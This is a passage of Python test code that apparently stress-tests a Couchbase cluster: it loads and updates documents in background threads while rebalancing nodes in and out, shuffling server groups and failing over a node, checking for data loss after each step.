self.check_dataloss(self.master, b,self.num_items*3)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items, b, self.num_items*3)))
for t in load_thread:
t.start()
new_server_list=list(set(new_server_list)- set(servers_out))
#swap rebalance 1 node
self.log.info("==========swap rebalance 1 node=========")
servers_in = self.servers[self.nodes_init : self.nodes_init + 1]
servers_init = self.servers[:self.nodes_init]
servers_out = self.servers[(self.nodes_init - 1) : self.nodes_init]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
rebalance.result()
for t in load_thread:
t.join()
self.sleep(30)
for b in bucket:
self.check_dataloss(self.master, b,self.num_items*4)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items, b, self.num_items*4)))
for t in load_thread:
t.start()
new_server_list=list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance out of 2 nodes and Rebalance In 1 node=========")
# Rebalance out of 2 nodes and Rebalance In 1 node
servers_in = [list(set(self.servers) - set(new_server_list))[0]]
servers_out = list(set(new_server_list) - set([self.master]))[-2:]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss(self.master, b,self.num_items*5)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items, b, self.num_items*5)))
for t in load_thread:
t.start()
new_server_list=list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance out of 1 nodes and Rebalance In 2 nodes=========")
#Rebalance out of 1 nodes and Rebalance In 2 nodes
servers_in = list(set(self.servers) - set(new_server_list))[0:2]
servers_out = list(set(new_server_list) - set([self.master]))[0:1]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss(self.master, b,self.num_items*6)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items, b, self.num_items*6)))
for t in load_thread:
t.start()
new_server_list=list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance in 4 nodes =========")
#Rebalance in 4 nodes
servers_in = list(set(self.servers) - set(new_server_list))[0:4]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, [])
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss(self.master, b,self.num_items*7)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items, b, self.num_items*7)))
for t in load_thread:
t.start()
new_server_list=list(set(new_server_list + servers_in))
self.log.info("==========Rebalance out 4 nodes =========")
#Rebalance out 4 nodes
servers_out = list(set(new_server_list) - set([self.master]))[0:4]
rebalance = self.cluster.async_rebalance(servers_init, [], servers_out)
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss(self.master, b,self.num_items*8)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items, b, self.num_items*8)))
for t in load_thread:
t.start()
new_server_list = list(set(new_server_list) - set(servers_out))
self.log.info("======Rebalance in 4 nodes (8 nodes) wait for rebalance to finish and move between server groups=========")
#Rebalance in 4 nodes (8 nodes) wait for rebalance to finish and move between server groups
servers_in = list(set(self.servers) - set(new_server_list))[0:4]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, [])
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss(self.master, b,self.num_items*9)
self.sleep(30)
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items, b, self.num_items * 9)))
for t in load_thread:
t.start()
self.shuffle_nodes_between_zones_and_rebalance()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss(self.master, b,self.num_items*10)
self.sleep(30)
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load, args=(self.master, self.num_items, b, self.num_items * 10)))
for t in load_thread:
t.start()
self.log.info("======Graceful failover 1 KV node and add back(Delta and Full)=========")
#Graceful failover 1 KV node and add back(Delta and Full)
kv_server = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=False)
fail_over_task = self.cluster.async_failover([self.master], failover_nodes=[kv_server], graceful=True)
fail_over_task.result()
self.sleep(120)
# do a recovery and rebalance
rest.set_recovery_type('ns_1@' + kv_server.ip, recoveryType=self.recoveryType)
rest.add_back_node('ns_1@' + kv_server.ip)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [])
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss(self.master, b,self.num_items*11)
self.sleep(30)
def test_volume_with_high_ops(self):
self.src_bucket = RestConnection(self.master).get_buckets()
rest = RestConnection(self.master)
bucket = rest.get_buckets()
start_at=0
total_doc=self.num_items
#load initial documents
self.create_ddocs_and_views()
load_thread=[]
for bk in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(self.master,bk, self.num_items,
self.batch_size, self.threads, start_at,self.instances)))
for t in load_thread:
t.start()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b,total_doc,batch=self.batch_size,instances=self.instances)
self.sleep(30)
start_at=total_doc
#Reload more data for mutations
load_thread=[]
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops,
args=(self.master,b, self.num_items,
self.batch_size, self.threads, start_at,self.instances)))
for t in load_thread:
t.start()
total_doc +=self.num_items
start_at=total_doc
servers_init = self.servers[:self.nodes_init]
# #Rebalance in 1 node
self.log.info("==========rebalance in 1 node=========")
servers_in=self.servers[self.nodes_init:self.nodes_init + 1]
rebalance = self.cluster.async_rebalance(servers_init,
servers_in, [])
for t in load_thread:
t.join()
for b in bucket:
num_keys=rest.get_active_key_count(b)
self.log.info("****** Number of doc in bucket : {}".format(num_keys))
total_doc,start_at=self.load_till_rebalance_progress(rest,bucket,total_doc,start_at)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b,total_doc,batch=self.batch_size,instances=self.instances)
# Reload more data for mutations
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops,
args=(self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
total_doc +=self.num_items
start_at=total_doc
# rebalance out 1 node
new_server_list = self.servers[0:self.nodes_init] + servers_in
self.log.info("==========rebalance out 1 node=========")
servers_out = [self.servers[self.nodes_init]]
rebalance = self.cluster.async_rebalance(servers_init, [], servers_out)
for t in load_thread:
t.join()
for b in bucket:
num_keys=rest.get_active_key_count(b)
self.log.info("****** Number of doc in bucket : {}".format(num_keys))
total_doc,start_at=self.load_till_rebalance_progress(rest,bucket,total_doc,start_at)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b,total_doc,batch=self.batch_size,instances=self.instances)
self.sleep(30)
# Reload more data for mutations
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
total_doc +=self.num_items
start_at=total_doc
new_server_list = list(set(new_server_list) - set(servers_out))
# swap rebalance 1 node
self.log.info("==========swap rebalance 1 node=========")
servers_in = self.servers[self.nodes_init: self.nodes_init + 1]
servers_init = self.servers[:self.nodes_init]
servers_out = self.servers[(self.nodes_init - 1): self.nodes_init]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
for t in load_thread:
t.join()
for b in bucket:
num_keys=rest.get_active_key_count(b)
self.log.info("****** Number of doc in bucket : {}".format(num_keys))
total_doc,start_at=self.load_till_rebalance_progress(rest,bucket,total_doc,start_at)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, batch=self.batch_size,instances=self.instances)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
total_doc +=self.num_items
start_at=total_doc
new_server_list = list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance out of 2 nodes and Rebalance In 1 node=========")
# Rebalance out of 2 nodes and Rebalance In 1 node
servers_in = [list(set(self.servers) - set(new_server_list))[0]]
servers_out = list(set(new_server_list) - set([self.master]))[-2:]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
for t in load_thread:
t.join()
for b in bucket:
num_keys=rest.get_active_key_count(b)
self.log.info("****** Number of doc in bucket : {}".format(num_keys))
total_doc,start_at=self.load_till_rebalance_progress(rest,bucket,total_doc,start_at)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc,batch=self.batch_size,instances=self.instances)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
total_doc += self.num_items
start_at = total_doc
new_server_list = list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance out of 1 nodes and Rebalance In 2 nodes=========")
# Rebalance out of 1 nodes and Rebalance In 2 nodes
servers_in = list(set(self.servers) - set(new_server_list))[0:2]
servers_out = list(set(new_server_list) - set([self.master]))[0:1]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
for t in load_thread:
t.join()
for b in bucket:
num_keys=rest.get_active_key_count(b)
self.log.info("****** Number of doc in bucket : {}".format(num_keys))
total_doc,start_at=self.load_till_rebalance_progress(rest,bucket,total_doc,start_at)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc,batch=self.batch_size,instances=self.instances)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
total_doc += self.num_items
start_at = total_doc
new_server_list = list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance in 4 nodes =========")
# Rebalance in 4 nodes
servers_in = list(set(self.servers) - set(new_server_list))[0:4]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, [])
for t in load_thread:
t.join()
for b in bucket:
num_keys=rest.get_active_key_count(b)
self.log.info("****** Number of doc in bucket : {}".format(num_keys))
total_doc,start_at=self.load_till_rebalance_progress(rest,bucket,total_doc,start_at)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc,batch=self.batch_size,instances=self.instances)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
total_doc += self.num_items
start_at = total_doc
new_server_list = list(set(new_server_list + servers_in))
self.log.info("==========Rebalance out 4 nodes =========")
# Rebalance out 4 nodes
servers_out = list(set(new_server_list) - set([self.master]))[0:4]
rebalance = self.cluster.async_rebalance(servers_init, [], servers_out)
for t in load_thread:
t.join()
for b in bucket:
num_keys=rest.get_active_key_count(b)
self.log.info("****** Number of doc in bucket : {}".format(num_keys))
total_doc,start_at=self.load_till_rebalance_progress(rest,bucket,total_doc,start_at)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc,batch=self.batch_size,instances=self.instances)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
total_doc += self.num_items
start_at = total_doc
new_server_list = list(set(new_server_list) - set(servers_out))
self.log.info(
"======Rebalance in 4 nodes (8 nodes) wait for rebalance to finish and move between server groups=========")
# Rebalance in 4 nodes (8 nodes) wait for rebalance to finish and move between server groups
servers_in = list(set(self.servers) - set(new_server_list))[0:4]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, [])
for t in load_thread:
t.join()
for b in bucket:
num_keys=rest.get_active_key_count(b)
self.log.info("****** Number of doc in bucket : {}".format(num_keys))
total_doc,start_at=self.load_till_rebalance_progress(rest,bucket,total_doc,start_at)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc,batch=self.batch_size,instances=self.instances)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
total_doc += self.num_items
start_at = total_doc
self.log.info("####### Shuffling zones and rebalance #######")
self.shuffle_nodes_between_zones_and_rebalance()
for t in load_thread:
t.join()
for b in bucket:
num_keys=rest.get_active_key_count(b)
self.log.info("****** Number of doc in bucket : {}".format(num_keys))
total_doc, start_at = self.load_till_rebalance_progress(rest, bucket, total_doc, start_at)
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc,batch=self.batch_size,instances=self.instances)
self.sleep(30)
# load more document
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
total_doc += self.num_items
start_at = total_doc
self.log.info("======Graceful failover 1 KV node and add back(Delta and Full)=========")
# Graceful failover 1 KV node and add back(Delta and Full)
kv_server = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=False)
fail_over_task = self.cluster.async_failover([self.master], failover_nodes=[kv_server], graceful=True)
fail_over_task.result()
self.sleep(120)
# do a recovery and rebalance
rest.set_recovery_type('ns_1@' + kv_server.ip, recoveryType=self.recoveryType)
rest.add_back_node('ns_1@' + kv_server.ip)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [])
for t in load_thread:
t.join()
for b in bucket:
num_keys=rest.get_active_key_count(b)
self.log.info("****** Number of doc in bucket : {}".format(num_keys))
total_doc, start_at = self.load_till_rebalance_progress(rest, bucket, total_doc, start_at)
rebalance.result()
for b in bucket:
errors=self.check_dataloss_for_high_ops_loader(self.master, b, total_doc,batch=self.batch_size,instances=self.instances)
if len(errors) > 0:
self.fail("data is missing");
self.sleep(30)
def test_volume_with_high_ops_update(self):
self.src_bucket = RestConnection(self.master).get_buckets()
rest = RestConnection(self.master)
bucket = rest.get_buckets()
start_at = 0
total_doc = self.num_items
updated=1
# load initial documents
self.create_ddocs_and_views()
load_thread = []
for bk in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, bk, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc,batch=self.batch_size,instances=self.instances)
self.sleep(30)
#Update all data
load_thread=[]
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops,
args=(self.master,b, total_doc,total_doc,
self.batch_size, self.threads, start_at,self.instances,updated)))
for t in load_thread:
t.start()
servers_init = self.servers[:self.nodes_init]
#Rebalance in 1 node
self.log.info("==========rebalance in 1 node=========")
servers_in=self.servers[self.nodes_init:self.nodes_init + 1]
rebalance = self.cluster.async_rebalance(servers_init,
servers_in, [])
for t in load_thread:
t.join()
#total_doc,start_at=self.load_till_rebalance_progress(rest,bucket,total_doc,start_at)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b,total_doc,updated=True,ops=total_doc,
batch=self.batch_size, instances=self.instances)
updated +=1
#Update all data
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, total_doc, total_doc, self.batch_size, self.threads, start_at, self.instances,updated)))
for t in load_thread:
t.start()
# rebalance out 1 node
new_server_list = self.servers[0:self.nodes_init] + servers_in
self.log.info("==========rebalance out 1 node=========")
servers_out = [self.servers[self.nodes_init]]
rebalance = self.cluster.async_rebalance(servers_init, [], servers_out)
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, updated=True,
ops=total_doc*updated,batch=self.batch_size,instances=self.instances)
updated +=1
#Update all data
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, total_doc, total_doc, self.batch_size, self.threads, start_at, self.instances,updated)))
for t in load_thread:
t.start()
new_server_list = list(set(new_server_list) - set(servers_out))
# swap rebalance 1 node
self.log.info("==========swap rebalance 1 node=========")
servers_in = self.servers[self.nodes_init: self.nodes_init + 1]
servers_init = self.servers[:self.nodes_init]
servers_out = self.servers[(self.nodes_init - 1): self.nodes_init]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, updated=True,
ops=total_doc*updated,batch=self.batch_size,instances=self.instances)
updated += 1
# Update all data
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, total_doc, total_doc, self.batch_size, self.threads, start_at, self.instances,
updated)))
for t in load_thread:
t.start()
new_server_list = list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance out of 2 nodes and Rebalance In 1 node=========")
# Rebalance out of 2 nodes and Rebalance In 1 node
servers_in = [list(set(self.servers) - set(new_server_list))[0]]
servers_out = list(set(new_server_list) - set([self.master]))[-2:]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, updated=True,
ops=total_doc * updated,batch=self.batch_size,instances=self.instances)
updated += 1
# Update all data
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, total_doc, total_doc, self.batch_size, self.threads, start_at, self.instances,
updated)))
for t in load_thread:
t.start()
self.log.info("==========Rebalance out of 1 nodes and Rebalance In 2 nodes=========")
new_server_list = list(set(new_server_list + servers_in) - set(servers_out))
# Rebalance out of 1 nodes and Rebalance In 2 nodes
servers_in = list(set(self.servers) - set(new_server_list))[0:2]
servers_out = list(set(new_server_list) - set([self.master]))[0:1]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, updated=True,
ops=total_doc * updated,batch=self.batch_size,instances=self.instances)
updated += 1
# Update all data
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, total_doc, total_doc, self.batch_size, self.threads, start_at, self.instances,
updated)))
for t in load_thread:
t.start()
new_server_list = list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance in 4 nodes =========")
# Rebalance in 4 nodes
servers_in = list(set(self.servers) - set(new_server_list))[0:4]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, [])
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, updated=True,
ops=total_doc * updated,batch=self.batch_size,instances=self.instances)
updated += 1
# Update all data
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, total_doc, total_doc, self.batch_size, self.threads, start_at, self.instances,
updated)))
for t in load_thread:
t.start()
new_server_list = list(set(new_server_list + servers_in))
self.log.info("==========Rebalance out 4 nodes =========")
# Rebalance out 4 nodes
servers_out = list(set(new_server_list) - set([self.master]))[0:4]
rebalance = self.cluster.async_rebalance(servers_init, [], servers_out)
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, updated=True,
ops=total_doc * updated, batch=self.batch_size,
instances=self.instances)
updated += 1
# Update all data
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, total_doc, total_doc, self.batch_size, self.threads, start_at, self.instances,
updated)))
for t in load_thread:
t.start()
new_server_list = list(set(new_server_list) - set(servers_out))
self.log.info(
"======Rebalance in 4 nodes (8 nodes) wait for rebalance to finish and move between server groups=========")
# Rebalance in 4 nodes (8 nodes) wait for rebalance to finish and move between server groups
servers_in = list(set(self.servers) - set(new_server_list))[0:4]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, [])
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, updated=True,
ops=total_doc * updated, batch=self.batch_size,
instances=self.instances)
updated += 1
# Update all data
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, total_doc, total_doc, self.batch_size, self.threads, start_at, self.instances,
updated)))
for t in load_thread:
t.start()
self.log.info("####### Shuffling zones and rebalance #######")
self.shuffle_nodes_between_zones_and_rebalance()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, updated=True,
ops=total_doc * updated, batch=self.batch_size,
instances=self.instances)
updated += 1
# Update all data
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, total_doc, total_doc, self.batch_size, self.threads, start_at, self.instances,
updated)))
for t in load_thread:
t.start()
self.log.info("======Graceful failover 1 KV node and add back(Delta and Full)=========")
# Graceful failover 1 KV node and add back(Delta and Full)
kv_server = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=False)
fail_over_task = self.cluster.async_failover([self.master], failover_nodes=[kv_server], graceful=True)
fail_over_task.result()
self.sleep(120)
# do a recovery and rebalance
rest.set_recovery_type('ns_1@' + kv_server.ip, recoveryType=self.recoveryType)
rest.add_back_node('ns_1@' + kv_server.ip)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [])
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
errors=self.check_dataloss_for_high_ops_loader(self.master, b, total_doc, updated=True,
ops=total_doc * updated, batch=self.batch_size,
instances=self.instances)
if len(errors) > 0:
self.fail("data is missing");
def test_volume_with_high_ops_create_update(self):
self.src_bucket = RestConnection(self.master).get_buckets()
rest = RestConnection(self.master)
bucket = rest.get_buckets()
start_at = 0
# load initial documents
self.create_ddocs_and_views()
load_thread = []
for bk in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, bk, self.initial_load, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for t in load_thread:
t.join()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, self.initial_load,batch=self.batch_size,instances=self.instances)
self.sleep(30)
total_doc = self.initial_load
start_at=total_doc
#Update initial doc and create more doc
load_thread=[]
create_thread=[]
updated=1
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops,
args=(self.master,b, self.initial_load,self.initial_load,
self.batch_size, self.threads, 0,self.instances,updated)))
create_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for th in create_thread:
th.start()
total_doc +=self.num_items
start_at=total_doc
updated +=1
servers_init = self.servers[:self.nodes_init]
#Rebalance in 1 node
self.log.info("==========rebalance in 1 node=========")
servers_in=self.servers[self.nodes_init:self.nodes_init + 1]
rebalance = self.cluster.async_rebalance(servers_init,
servers_in, [])
self.sleep(10)
for t in load_thread:
t.join()
for th in create_thread:
th.join()
total_doc,start_at,updated=self.create_update_till_rebalance_progress(rest,bucket,total_doc,start_at,updated)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b,self.initial_load,start_document=0,updated=True,
ops=self.initial_load*(updated-1),batch=self.batch_size,instances=self.instances)
self.check_dataloss_for_high_ops_loader(self.master,b,total_doc-self.initial_load,
start_document=self.initial_load,batch=self.batch_size,instances=self.instances)
# Update initial doc and create more doc
load_thread = []
create_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, self.initial_load, self.initial_load, self.batch_size, self.threads, 0, self.instances, updated)))
create_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for th in create_thread:
th.start()
total_doc += self.num_items
start_at = total_doc
updated +=1
# rebalance out 1 node
new_server_list = self.servers[0:self.nodes_init] + servers_in
self.log.info("==========rebalance out 1 node=========")
servers_out = [self.servers[self.nodes_init]]
rebalance = self.cluster.async_rebalance(servers_init, [], servers_out)
rebalance.result()
self.sleep(5)
for t in load_thread:
t.join()
for th in create_thread:
th.join()
total_doc,start_at,updated=self.create_update_till_rebalance_progress(rest,bucket,total_doc,start_at,updated)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b,self.initial_load,start_document=0,updated=True,
ops=self.initial_load*(updated-1),
batch=self.batch_size,instances=self.instances)
self.check_dataloss_for_high_ops_loader(self.master,b,total_doc-self.initial_load,
start_document=self.initial_load, batch=self.batch_size,
instances=self.instances)
# Update initial doc and create more doc
load_thread = []
create_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, self.initial_load, self.initial_load, self.batch_size, self.threads, 0, self.instances,
updated)))
create_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for th in create_thread:
th.start()
total_doc += self.num_items
start_at = total_doc
updated +=1
new_server_list = list(set(new_server_list) - set(servers_out))
# swap rebalance 1 node
self.log.info("==========swap rebalance 1 node=========")
servers_in = self.servers[self.nodes_init: self.nodes_init + 1]
servers_init = self.servers[:self.nodes_init]
servers_out = self.servers[(self.nodes_init - 1): self.nodes_init]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
self.sleep(10)
for t in load_thread:
t.join()
for th in create_thread:
th.join()
total_doc, start_at, updated = self.create_update_till_rebalance_progress(rest, bucket, total_doc, start_at,
updated)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b,self.initial_load,start_document=0,updated=True,
ops=self.initial_load*(updated-1), batch=self.batch_size,
instances=self.instances)
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc - self.initial_load,
start_document=self.initial_load, batch=self.batch_size,
instances=self.instances)
# Update initial doc and create more doc
load_thread = []
create_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, self.initial_load, self.initial_load, self.batch_size, self.threads, 0,
self.instances, updated)))
create_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for th in create_thread:
th.start()
total_doc += self.num_items
start_at = total_doc
updated += 1
new_server_list = list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance out of 2 nodes and Rebalance In 1 node=========")
# Rebalance out of 2 nodes and Rebalance In 1 node
servers_in = [list(set(self.servers) - set(new_server_list))[0]]
servers_out = list(set(new_server_list) - set([self.master]))[-2:]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
self.sleep(10)
for t in load_thread:
t.join()
for th in create_thread:
th.join()
total_doc, start_at, updated = self.create_update_till_rebalance_progress(rest, bucket, total_doc, start_at,
updated)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, self.initial_load, start_document=0, updated=True,
ops=self.initial_load * (updated - 1),
batch=self.batch_size,instances=self.instances)
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc - self.initial_load,
start_document=self.initial_load, batch=self.batch_size,
instances=self.instances)
# Update initial doc and create more doc
load_thread = []
create_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, self.initial_load, self.initial_load, self.batch_size, self.threads, 0,
self.instances, updated)))
create_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for th in create_thread:
th.start()
total_doc += self.num_items
start_at = total_doc
updated += 1
new_server_list = list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance out of 1 nodes and Rebalance In 2 nodes=========")
# Rebalance out of 1 nodes and Rebalance In 2 nodes
servers_in = list(set(self.servers) - set(new_server_list))[0:2]
servers_out = list(set(new_server_list) - set([self.master]))[0:1]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
self.sleep(10)
for t in load_thread:
t.join()
for th in create_thread:
th.join()
total_doc, start_at, updated = self.create_update_till_rebalance_progress(rest, bucket, total_doc, start_at,
updated)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, self.initial_load, start_document=0, updated=True,
ops=self.initial_load * (updated - 1), batch=self.batch_size,
instances=self.instances)
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc - self.initial_load,
start_document=self.initial_load, batch=self.batch_size,
instances=self.instances)
# Update initial doc and create more doc
load_thread = []
create_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, self.initial_load, self.initial_load, self.batch_size, self.threads, 0,
self.instances, updated)))
create_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for th in create_thread:
th.start()
total_doc += self.num_items
start_at = total_doc
updated += 1
